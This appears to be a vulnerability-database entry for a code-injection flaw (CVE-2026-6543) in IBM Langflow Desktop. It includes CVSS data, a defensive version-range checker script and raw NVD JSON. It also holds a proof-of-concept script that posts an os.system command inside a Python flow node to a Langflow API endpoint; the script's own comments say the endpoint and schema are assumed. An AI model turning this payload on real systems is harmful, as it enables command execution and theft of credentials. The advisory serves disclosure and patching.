Security Vulnerability Report
CVE-2026-6543 CVSS 8.8 HIGH

Published: 2026-04-30 22:16:26
Last Modified: 2026-05-11 17:04:59

Description

IBM Langflow Desktop 1.0.0 through 1.8.4 allows an attacker to execute arbitrary commands with the privileges of the process running Langflow. Successful exploitation allows reading sensitive environment variables (API keys, DB credentials), modifying files, or launching further attacks on the internal network.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Weakness
CWE-94 (Improper Control of Generation of Code, 'Code Injection')

Configurations (Affected Products)

cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:* - VULNERABLE
IBM Langflow Desktop, versions 1.0.0 through 1.8.4 inclusive (versionStartIncluding 1.0.0, versionEndIncluding 1.8.4)
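The affected range above is expressed in NVD's configuration format: a cpeMatch with versionStartIncluding / versionEndIncluding bounds rather than a list of discrete versions. The following is an added example, not part of this report or of any NVD or IBM tool, of evaluating that format against an installed version. The configuration constant is copied from the Raw JSON Data on this page; the function names and the version strings being tested are the example's own; and the two bounds this CVE does not use (versionStartExcluding, versionEndExcluding) are handled as a generalization. Only the OR node layout used here is evaluated; AND-combined or negated nodes are deliberately not interpreted.

```python
import json

# Configuration block copied from this CVE's NVD JSON (the "configurations" field).
CVE_CONFIGURATIONS = json.loads("""
[{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true,
  "criteria": "cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:*",
  "versionStartIncluding": "1.0.0", "versionEndIncluding": "1.8.4",
  "matchCriteriaId": "83CB6A3F-0146-4A7A-9FDF-7F49CCBBC143"}]}]}]
""")


def version_key(version: str) -> tuple:
    """Turn '1.8.4' into a tuple that compares numerically per component.
    String comparison gets this wrong: '1.10.0' < '1.8.4' as text but > numerically.
    Non-numeric components (e.g. 'rc1') sort after numeric ones."""
    parts = []
    for piece in version.split("."):
        parts.append((0, int(piece)) if piece.isdigit() else (1, piece))
    return tuple(parts)


def cpe_product(criteria: str) -> tuple:
    """Return (vendor, product) from a CPE 2.3 formatted string."""
    fields = criteria.split(":")
    return fields[3], fields[4]


def match_in_range(match: dict, version: str) -> bool:
    """Apply the four optional NVD range bounds of one cpeMatch to a version."""
    v = version_key(version)
    lo_inc = match.get("versionStartIncluding")
    lo_exc = match.get("versionStartExcluding")
    hi_inc = match.get("versionEndIncluding")
    hi_exc = match.get("versionEndExcluding")
    if lo_inc is not None and v < version_key(lo_inc):
        return False
    if lo_exc is not None and v <= version_key(lo_exc):
        return False
    if hi_inc is not None and v > version_key(hi_inc):
        return False
    if hi_exc is not None and v >= version_key(hi_exc):
        return False
    # A CPE with a concrete version field and no range bounds matches only that version.
    cpe_version = match["criteria"].split(":")[5]
    if cpe_version != "*" and all(b is None for b in (lo_inc, lo_exc, hi_inc, hi_exc)):
        return version_key(cpe_version) == v
    return True


def is_vulnerable(configurations: list, vendor: str, product: str, version: str) -> bool:
    """True if any vulnerable cpeMatch for vendor/product covers `version`.
    Assumption: nodes are evaluated independently (the OR layout this CVE uses)."""
    for config in configurations:
        for node in config["nodes"]:
            for match in node.get("cpeMatch", []):
                if not match.get("vulnerable", False):
                    continue
                if cpe_product(match["criteria"]) != (vendor, product):
                    continue
                if match_in_range(match, version):
                    return True
    return False


if __name__ == "__main__":
    # Constructed inventory: (vendor, product, installed version) tuples to triage.
    for vendor, product, ver in [("langflow", "langflow_desktop", "1.8.4"),
                                 ("langflow", "langflow_desktop", "1.10.0"),
                                 ("langflow", "langflow_desktop", "0.9.9")]:
        print(vendor, product, ver, "VULNERABLE" if is_vulnerable(CVE_CONFIGURATIONS, vendor, product, ver) else "not affected")
```

The boundary versions are the ones to check by hand when writing such matchers: 1.8.4 is inside the range because the bound is "Including", and 1.10.0 is outside only if the comparison is numeric.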

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json
import requests

# Target URL (example). The endpoint path and the node schema below are assumptions
# of this PoC; they are not taken from the IBM advisory.
target_url = "http://localhost:3000/api/v1/process"

# Malicious payload attempting to execute OS commands
# Assuming the application takes a 'command' or 'code' parameter
data = {
    "flow": {
        "nodes": [
            {
                "id": "1",
                "type": "PythonFunction",
                "data": {
                    # Payload to execute 'id' command via os.system
                    "code": "import os; os.system('id')"
                }
            }
        ]
    }
}

# The CVSS vector scores PR:L, so a real request needs a valid low-privilege
# session or token; none is sent here.
headers = {"Content-Type": "application/json"}

try:
    response = requests.post(target_url, data=json.dumps(data), headers=headers, timeout=10)
    print(f"Status Code: {response.status_code}")
    print("Response Body:")
    print(response.text)
except Exception as e:
    print(f"An error occurred: {e}")

References

https://www.ibm.com/support/pages/node/7271092 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6543", "sourceIdentifier": "[email protected]", "published": "2026-04-30T22:16:26.467", "lastModified": "2026-05-11T17:04:58.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Langflow Desktop 1.0.0 through 1.8.4 Langflow allows an attacker to execute arbitrary commands with the privileges of the process running Langflow. This allows reading sensitive environment variables (API keys, DB credentials), modifying files, or launching further attacks on the internal network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langflow:langflow_desktop:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndIncluding": "1.8.4", "matchCriteriaId": "83CB6A3F-0146-4A7A-9FDF-7F49CCBBC143"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7271092", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}